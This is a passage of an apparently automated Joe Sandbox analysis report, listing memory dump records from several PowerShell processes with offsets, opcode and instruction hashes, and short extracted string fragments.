                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: d6$PM$p@s$x._
                                                                                                                • API String ID: 0-4004481620
                                                                                                                • Opcode ID: a3707fdd54644e70b22dedf76f19dfe51e8b848f6e412cbae961f0affed33418
                                                                                                                • Instruction ID: 0394e7ffa2f2c9d5f634a468baa4fec715361bc0963005daa5aa15e5a5fa893e
                                                                                                                • Opcode Fuzzy Hash: a3707fdd54644e70b22dedf76f19dfe51e8b848f6e412cbae961f0affed33418
                                                                                                                • Instruction Fuzzy Hash: 9C81F452D8E6C25FE3969774982917C7FB0BF6369071801FFC0EA8B1DBD9099819C382
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.1501216809.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: L_^4$L_^7$L_^F$L_^J
                                                                                                                • API String ID: 0-3225005683
                                                                                                                • Opcode ID: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                • Instruction ID: bf73de9190a631f0e5857521b6b1f9c4c648db80c959f5714543f87d2402c667
                                                                                                                • Opcode Fuzzy Hash: 8102688ab214c8cdd39813c713289ae0ebbb44b5a4c555a5b4d77903fd85f6ad
                                                                                                                • Instruction Fuzzy Hash: C62126B7A081294ED3017BFDF8046ED3740DF952B434552B2D2AD8B003EA187087CAE1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 4f757ca3bb2903d7a354ffbfde25b4b67cac25a5eb53df01b8235f8e813e0617
                                                                                                                • Instruction ID: 63849f5ba320546fe74ff89661c72c5c457a6f708e799aaf0a7c5c2eb826088e
                                                                                                                • Opcode Fuzzy Hash: 4f757ca3bb2903d7a354ffbfde25b4b67cac25a5eb53df01b8235f8e813e0617
                                                                                                                • Instruction Fuzzy Hash: FEC12221D6DA8A8FE7A9AB6858155BD7BE1FF46B91F1402BEE40DCB483DD1CA801C341
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 2ae8b6d299c89308e15f93a52eba67f8ab29c82f522d0f02e3f65dba801bc19d
                                                                                                                • Instruction ID: d40789345ae55164f8179d75b92a4cd0d510440d967167bdb309e9d49b41de84
                                                                                                                • Opcode Fuzzy Hash: 2ae8b6d299c89308e15f93a52eba67f8ab29c82f522d0f02e3f65dba801bc19d
                                                                                                                • Instruction Fuzzy Hash: BCB11570A1CB884FE749EF18C885AB9BBE1FF95351F10027ED48AC7196DA35E846CB41
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 353ecd3ebb6f17c8b956ec7613845bd17dfd3c38c135a6010b97a40908f9ec99
                                                                                                                • Instruction ID: a07826a4b88b2bf34189557a648cd1716ed49afa8cb44da0b148f65f7585a855
                                                                                                                • Opcode Fuzzy Hash: 353ecd3ebb6f17c8b956ec7613845bd17dfd3c38c135a6010b97a40908f9ec99
                                                                                                                • Instruction Fuzzy Hash: 04F0A031849A8DCFCB86DF2888594E87FF0FF65241B0502ABE409C7061EB659948CBC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 73c10b54df67a10fec0cf83f92fc11fbbee1b54a3a355081e1c250f3e1be0339
                                                                                                                • Instruction ID: 05e8de4fb0fbee2e23474fa36072c7c91a049fe891e08a5790aec2b947ca0dda
                                                                                                                • Opcode Fuzzy Hash: 73c10b54df67a10fec0cf83f92fc11fbbee1b54a3a355081e1c250f3e1be0339
                                                                                                                • Instruction Fuzzy Hash: 7741097190CB888FE758DF1C9C0A6B97BF0FB65310F04416FE04993252DA74A85ACBC2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1831471766.00007FF887C3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C3D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887c3d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 92f668572ef6f8102e66d313a016e4299d931a924dd1f28777d053983fa50524
                                                                                                                • Instruction ID: 52e84aa8402dabbb4deeed551ad9b74b0041819f62042335e7efd35985f58e21
                                                                                                                • Opcode Fuzzy Hash: 92f668572ef6f8102e66d313a016e4299d931a924dd1f28777d053983fa50524
                                                                                                                • Instruction Fuzzy Hash: F441137180DBC44FE7579B38D8559623FF0EF56360B1905EFE088CB1A3D625A84AC7A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                • Instruction ID: 1a6daca573c69e7de735de054f62f81451822c0c8c25e81550fb5a368bff336d
                                                                                                                • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                • Instruction Fuzzy Hash: 1C01A73110CB0C4FD744EF0CE051AA9B3E0FB85364F10052DE58AC3661DA36E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3f7660fbffbed2b80ae1422a654932b779e987fd4638da6cdcd1c30995fe5dae
                                                                                                                • Instruction ID: a089918599087f6b64379aa9aacb884a6bf25566625e7259ad2346ec4776d764
                                                                                                                • Opcode Fuzzy Hash: 3f7660fbffbed2b80ae1422a654932b779e987fd4638da6cdcd1c30995fe5dae
                                                                                                                • Instruction Fuzzy Hash: A9F09A32A4CA088FE758EA4CE8018A873E0FF5536072140BAE01DC75A3CA29EC45C741
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5cfe6e9dbb1dbfa4902fbdc0fb31014d543469f321557d3edfce1fba0f4b5199
                                                                                                                • Instruction ID: a838b1a1fdae739aabe2124e8e216d6529b9fa36ff28a73e3bd0712f1c932651
                                                                                                                • Opcode Fuzzy Hash: 5cfe6e9dbb1dbfa4902fbdc0fb31014d543469f321557d3edfce1fba0f4b5199
                                                                                                                • Instruction Fuzzy Hash: DFF0B832A4C6448FE758EA4CE8418ACB7F0FF06720B2100B6E01DCB4A3DA2AAC55C750
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1835983417.00007FF887E20000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E20000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887e20000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction ID: 0725b66e5d95a782a091e5d3ed8802c2f20a4875e29ad6b9ee4f9fa44a7478a8
                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction Fuzzy Hash: B6E01A31B5C8088FEB68DA0CE0409AD73E1FB9936172101B7E14EC7962CA26EC51CB80
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: (0_$8,_$H1_$P/_$]$p0_$-_$/_
                                                                                                                • API String ID: 0-2624468954
                                                                                                                • Opcode ID: 92723b222080ea3cad509ff8f0a68f150effa2c786a3282c6a1d2f6f08786e51
                                                                                                                • Instruction ID: 57087fb75083ffde8b21b2e58073e2903d4e01b400d3dcb0b3cfb1a5360e8060
                                                                                                                • Opcode Fuzzy Hash: 92723b222080ea3cad509ff8f0a68f150effa2c786a3282c6a1d2f6f08786e51
                                                                                                                • Instruction Fuzzy Hash: 9051F062D8EAC2DFF3164774181917CAFB1FF62690B5842FBC0A94B0DBDD069819C785
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: K_^8$K_^<$K_^?$K_^J$K_^K$K_^N$K_^Q$K_^Y
                                                                                                                • API String ID: 0-2350917820
                                                                                                                • Opcode ID: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                                                                                • Instruction ID: 801febb3812832c273fdb5bc989536bf9a3f500f6f46bf7f74506b518dbe3375
                                                                                                                • Opcode Fuzzy Hash: 4d511a56c9d75752d4573350cecfee82ab797f1e65113e8d56fb972c6edfed05
                                                                                                                • Instruction Fuzzy Hash: 6821F6B3A085195ACB0236BDF8816EC77A1EF553B834502F3E02DDF113DD18A58B8A91
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000E.00000002.1833788819.00007FF887D50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D50000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_14_2_7ff887d50000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: dA$@J_$]$p@s$x._
                                                                                                                • API String ID: 0-76705859
                                                                                                                • Opcode ID: 94e6033c273cf4b12615bcdb4d7532dc7fd05c277cd46bdd1938a058dbbc3edf
                                                                                                                • Instruction ID: acd079936ba1ea0c7101f351e0be5ed854d7610a572f9a9fd369df3651840b52
                                                                                                                • Opcode Fuzzy Hash: 94e6033c273cf4b12615bcdb4d7532dc7fd05c277cd46bdd1938a058dbbc3edf
                                                                                                                • Instruction Fuzzy Hash: 5F711262C4FAC1CFF32A4A78281917C6EB1BF12680B9C01FBC0994B0DFE9559D19C345
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9f74f8fd57ee9614562f7aa5d817e9411027c1776827280705312cca201203ef
                                                                                                                • Instruction ID: 40b357d4a9a69065ffc30cb26eec70a9099b5dbe77fed1ef314c7a33d1ee8294
                                                                                                                • Opcode Fuzzy Hash: 9f74f8fd57ee9614562f7aa5d817e9411027c1776827280705312cca201203ef
                                                                                                                • Instruction Fuzzy Hash: BAC11431D4DA8A8FE7A6AF6858165BD7BE1FF46B91B1401BED40DCB083DE1CA805C361
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 7117f37ff16e225219123140aa76956c217e832147e7e94c589f9ab2c98d203b
                                                                                                                • Instruction ID: 4ecd04442ec59358a88fd76f7465db469669eb613b93b7857be17f145309b829
                                                                                                                • Opcode Fuzzy Hash: 7117f37ff16e225219123140aa76956c217e832147e7e94c589f9ab2c98d203b
                                                                                                                • Instruction Fuzzy Hash: D0513631A4CA854FE38ADB28CC955687BF0FF96354B1802BED48ACB1D7EE15A807C745
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1822273284.00007FF887C2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C2D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887c2d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 22622c573d40268b591f700cf19ca4c6dcd40de047d43ad6a8e2d7491a362930
                                                                                                                • Instruction ID: 27b5dbaf7fa5737f7c46bc3d27f13bc6459f3dfbd111acaa968bd674ee9bb6b8
                                                                                                                • Opcode Fuzzy Hash: 22622c573d40268b591f700cf19ca4c6dcd40de047d43ad6a8e2d7491a362930
                                                                                                                • Instruction Fuzzy Hash: 1741003040DBC45FE7569B28D8559623FF1FF57360B1906DFD088CB1A3D629A84AC7A2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: cc8c46be30f47b73c914c6a066df96a0e452649d91e8eb979bed765883164ace
                                                                                                                • Instruction ID: 1d84d1e142a210759420a19c2a92776907e6165c84183d7b9df0a4fb27f5c87b
                                                                                                                • Opcode Fuzzy Hash: cc8c46be30f47b73c914c6a066df96a0e452649d91e8eb979bed765883164ace
                                                                                                                • Instruction Fuzzy Hash: 7A31F83194DB884FDB59DB6898496E97FF0FFA6320F0441AFC049C7153D6645806CB52
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction ID: 5b75784d4932cbf52903e89cf688f523059bf7730c4ababde96d3da05b2be3b7
                                                                                                                • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                                                                                • Instruction Fuzzy Hash: 2C01A73114CB0C4FD744EF0CE051AA9B3E0FB85360F10052DE58AC3651DA36E882CB42
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 152c30cbff3826d2e2b7f6a1c1e33fad8618abb8b595b48cb12e760310e8fb08
                                                                                                                • Instruction ID: 25100d233344dfda111503bc280413dcfe814d154a36f70679086f619c6441a5
                                                                                                                • Opcode Fuzzy Hash: 152c30cbff3826d2e2b7f6a1c1e33fad8618abb8b595b48cb12e760310e8fb08
                                                                                                                • Instruction Fuzzy Hash: 91F0FC7658898D4FD782DF2CDC590E87FB0FFA5241B0401ABE449C7092E7218409C7C1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 77c6628e04e16379b24dfcacd932c8202fc662a7d4e7861e09f34e332d319352
                                                                                                                • Instruction ID: 8266dbd5b0d794a6e49ddd589c82eeb6ab0d2ed164d27f13aa5f1a39c501f339
                                                                                                                • Opcode Fuzzy Hash: 77c6628e04e16379b24dfcacd932c8202fc662a7d4e7861e09f34e332d319352
                                                                                                                • Instruction Fuzzy Hash: 7EF09031A4C5058FD798DA4CE4014A873E0FF5536172240B6E01DC7663CA29EC45C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: ce7bc5d48eb987701467f7943178399b16da9dcce819f7cf07d96be06a3c5b73
                                                                                                                • Instruction ID: 405dde61bdae551c3e20cb906ddea0fe0a2808859ec3cbfed8297c40c861611a
                                                                                                                • Opcode Fuzzy Hash: ce7bc5d48eb987701467f7943178399b16da9dcce819f7cf07d96be06a3c5b73
                                                                                                                • Instruction Fuzzy Hash: 0CF0BE31A4C5448FE794EB4CE4428AC73F0FF0572171100B6E01DC7553DA29AC55C760
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1826815255.00007FF887E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E10000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887e10000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction ID: 7d1fd6164339a85354eaac2052dfe35a48c907795c44331892bcea9503b24e69
                                                                                                                • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                                                                                                • Instruction Fuzzy Hash: EBE0123174C405CFD6A8DA0CE0419ED73E1FB9936172101B7D15EC7661C625EC91CB90
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: L_^4$L_^5$L_^@$L_^N$L_^U$L_^Y
                                                                                                                • API String ID: 0-3939689582
                                                                                                                • Opcode ID: a0b19e4223c0868700c156260f9fe179b63fe9574ae263aaa0fe37affc383703
                                                                                                                • Instruction ID: 39957dd05d68131eccaf9d93604e79d168eeb8282b798714a2b295c73d30f3a0
                                                                                                                • Opcode Fuzzy Hash: a0b19e4223c0868700c156260f9fe179b63fe9574ae263aaa0fe37affc383703
                                                                                                                • Instruction Fuzzy Hash: E83115B7B085290AC30136FDF8822ED3750EF952B674452B7D39DCB053CE29608B86E2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: dA$@J_$]$p@s$x._
                                                                                                                • API String ID: 0-76705859
                                                                                                                • Opcode ID: d6b9bbf6f2827fe0f101ce95209d3e72c8b16fb9019527980e07f95d570b16d6
                                                                                                                • Instruction ID: c1b7d10ce88c8dede27c38c5a1cf0fc170e12fe7274c831d87edfa10b00bb55b
                                                                                                                • Opcode Fuzzy Hash: d6b9bbf6f2827fe0f101ce95209d3e72c8b16fb9019527980e07f95d570b16d6
                                                                                                                • Instruction Fuzzy Hash: 48711462D8EAC14FE3974AB868191BC6EB1BF92680B9841FBC09D4B0DFE9459D19C341
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.1824537519.00007FF887D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D40000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_7ff887d40000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: L_^$L_^$L_^$L_^$L_^
                                                                                                                • API String ID: 0-205492149
                                                                                                                • Opcode ID: 2e99249bb0eb2b0300122dc0eeecea234c5e5dabf88e425ce057a8119ee729de
                                                                                                                • Instruction ID: 66b4b1778ee3ed1f681688350a880cd356acc975a6f7ed25a9649bdf9cf94e6e
                                                                                                                • Opcode Fuzzy Hash: 2e99249bb0eb2b0300122dc0eeecea234c5e5dabf88e425ce057a8119ee729de
                                                                                                                • Instruction Fuzzy Hash: A63197A3A8D9D30FE39742198CA60AD6FB1FFA22D8B0D42F6C1C58F0D7EE5458078151
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: 6B$UR_H
                                                                                                                • API String ID: 0-3568712714
                                                                                                                • Opcode ID: 360ae2afb8a643a7706046ac5ffd5c46d97fd06dd02ac2459065440f428140ae
                                                                                                                • Instruction ID: d4e5b276da7bee180dd48bda194d509807ec4b43a594d2260b42dbc615d887ac
                                                                                                                • Opcode Fuzzy Hash: 360ae2afb8a643a7706046ac5ffd5c46d97fd06dd02ac2459065440f428140ae
                                                                                                                • Instruction Fuzzy Hash: D5521831A4CA8A8FEB45DB1CC855ABD7BF1FF55354F1402BAC44EC719BEA24A842C781
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2094146570.00007FF887E00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887E00000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887e00000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: aeea4a4af50561ef121da1d17d414fc8691b68c4639c4b5e626d8b7ff7cd57cc
                                                                                                                • Instruction ID: b30cdcca524ebe4b2531a297b87168da76baae4f4e087fb79b910ce82ef7e70f
                                                                                                                • Opcode Fuzzy Hash: aeea4a4af50561ef121da1d17d414fc8691b68c4639c4b5e626d8b7ff7cd57cc
                                                                                                                • Instruction Fuzzy Hash: B3C10331D4DA8A8FE7A5EB6858156BD7BF1FF46B94B0801BED40DCB093D92CA805C351
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 037d27cf1861832f10738b49052e5b8a7e8c6415888c90cea2168e7e74c53559
                                                                                                                • Instruction ID: 5679145eb1c59a9c6aab423623251ee350eb4152228a9a6aedd0405053d2c06a
                                                                                                                • Opcode Fuzzy Hash: 037d27cf1861832f10738b49052e5b8a7e8c6415888c90cea2168e7e74c53559
                                                                                                                • Instruction Fuzzy Hash: DC610731A4DB864FE34ADA288CA54787BF0FF9635471802BED48ACB197FD19A807C751
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 5cc0fb306f06ba30a899db2818a3d85535797b79c446f9e80e061d363b54aba2
                                                                                                                • Instruction ID: c1425a9cdea577bcc39bca9bc579ce163d4532a02dc3cf97458f56c0ddbaae7e
                                                                                                                • Opcode Fuzzy Hash: 5cc0fb306f06ba30a899db2818a3d85535797b79c446f9e80e061d363b54aba2
                                                                                                                • Instruction Fuzzy Hash: 5F51C873E4999B4FE702976C9C660EC3BA0FFA2269B0C03B2D49D8F097FD1954178691
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2092619762.00007FF887D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887D30000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887d30000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 9052058ba27cdd788d744543baba28bbc395bca24088e127a05cc088f29790a3
                                                                                                                • Instruction ID: 0160077713eef705cba5f74530508c2b0cc1b49260032e74cd1f68ed58673aab
                                                                                                                • Opcode Fuzzy Hash: 9052058ba27cdd788d744543baba28bbc395bca24088e127a05cc088f29790a3
                                                                                                                • Instruction Fuzzy Hash: F441FA71D0CA498FE7589F5CA8066FD7BE0FB65715F00426FE04993296DA20A816C7C2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000012.00000002.2091056443.00007FF887C1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887C1D000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_18_2_7ff887c1d000_powershell.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3af16b196e29d1ab6fc1bc8c1a75330942882030cb1919bda94669fb664202e8
